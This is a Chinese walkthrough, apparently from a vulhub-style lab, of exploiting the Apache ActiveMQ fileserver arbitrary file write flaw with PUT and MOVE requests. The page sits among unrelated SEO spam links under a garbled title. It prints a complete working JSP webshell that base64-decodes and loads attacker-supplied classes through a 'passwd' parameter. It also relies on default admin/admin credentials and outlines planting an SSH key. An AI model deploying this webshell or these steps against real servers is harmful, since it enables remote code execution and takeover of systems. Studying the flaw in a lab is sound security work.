当前位置: 首页 > news >正文

网站开发用哪些技术客户管理系统哪家好

网站开发用哪些技术,客户管理系统哪家好,河池网站建设公司,苏州360推广网站建设在 Apache ActiveMQ 5.12.x~5.13.x 版本中,默认关闭了 fileserver 这个应用(不过,可以在conf/jetty.xml 中开启);在 5.14.0 版本后,彻底删除了 fileserver 应用。【所以在渗透测试过程中要确定好 ActiveMQ …

  在 Apache ActiveMQ 5.12.x~5.13.x 版本中,默认关闭了 fileserver 这个应用(不过,可以在conf/jetty.xml 中开启);在 5.14.0 版本后,彻底删除了 fileserver 应用。【所以在渗透测试过程中要确定好 ActiveMQ 的版本,免去无用功】

该漏洞出现在 fileserver 应用中,漏洞原理是 fileserver 支持写入文件(但不解析 jsp),同时支持移动文件(MOVE 请求)。所以我们只需写入一个文件,然后使用 MOVE 请求将其移动到任意位置,造成任意文件写入漏洞。

写入文件方法

写入 webshell

写入 cron 或 ssh key 等文件

写入 jar 或 jetty.xml 等库和配置文件

启动环境

方法一:写入webshell

【该方法的使用条件】

1、需要知道 ActiveMQ 的绝对路径

2、需要能登录 admin 或者 api

【分析条件】

1、ActiveMQ 的绝对路径可以通过 http://your-ip:8161/admin/test/systemProperties.jsp 页面获取,不过该页面需要登录才能访问。

2、获取用户名和密码,可以通过弱口令、暴力破解、社工等方法(不过题目已经给出了默认用户名和密码 admin/admin,这里就省去了这个步骤)

绝对路径

开始抓包 直接抓jsp

webshell

<%!

class U extends ClassLoader {

U(ClassLoader c) {

super(c);

}

public Class g(byte[] b) {

return super.defineClass(b, 0, b.length);

}

}

public byte[] base64Decode(String str) throws Exception {

try {

Class clazz = Class.forName("sun.misc.BASE64Decoder");

return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);

} catch (Exception e) {

Class clazz = Class.forName("java.util.Base64");

Object decoder = clazz.getMethod("getDecoder").invoke(null);

return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);

}

}

%>

<%

String cls = request.getParameter("passwd");

if (cls != null) {

new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);

}

%>

修改成如下

204表示成功

MOVE 方法将 webshell 移动到 admin 所在文件夹,响应 204 表示操作成功

当然了,移动到 api 下也是可以的,我这边移动到 admin 目录下

蚁剑连接webshell

重点是记住 admin 应用是需要登录的,所以记得一定要在连接中添加 Authorization

方法二:ssh上传公钥

攻击机生成公钥

下载下来       也可以直接复制内容

上传

move更改

http://www.yayakq.cn/news/437085/

相关文章:

  • 专业的丹徒网站建设常州哪家做网站好
  • 临沂做网站建设的公司哪家好百度图片搜索引擎
  • 那些域名可以做后缀做网站网站建设与维护典型案例
  • 怎么增加网站流量自己怎么设计装修房子
  • 二手网站哪些做的比较好开发一个app需要做什么
  • 福州市市政建设开发有限公司网站教育培训网络推广培训
  • 全返网站建设小程序开发 与网站开发区别
  • 一个门户网站多少钱金坛做网站的
  • 淄博网站制作定制品牌手机短视频网站的建设
  • 做企业网站的意义杭州网站建设 网络服务
  • 网上做预算的网站网站策划书的主题有哪些
  • 实验室网站模板新华书店网站建设
  • 如何选择家居网站建设网站建设维护与网页设计
  • 招生网站建设方案北京网站建设询q479185700上快
  • 深圳手机网站模板建设网上银行网站
  • 陕西网站建设网络公司wordpress修改端口
  • 内蒙古建设部网站官网个人电脑可以做网站服务器吗
  • 有没有专门建设网站的公司东营网站建设那家好
  • 网站建设引言学习网站开发流程
  • 做电商需要知道的几个网站青岛市城市建设档案馆网站
  • 做网站CentOS还是win好个人介绍网站模板
  • 无锡建设网站的公司dedecms 做影网站
  • 网站开发哪种语言科技有限公司最低注册资金
  • 网站开发中如何实现gps定位怎么把网站维护
  • h5手机网站怎么做05网语文
  • 聚成网站建设怎么做企业网站运营
  • 江油专业网站建设咨询做网站后台程序是怎么来的
  • 文明网站建设情况报告岳麓区营销型网站建设定制
  • 网站排名外包个人微信营销
  • 谁在万网建设的网站网站seo诊断评分45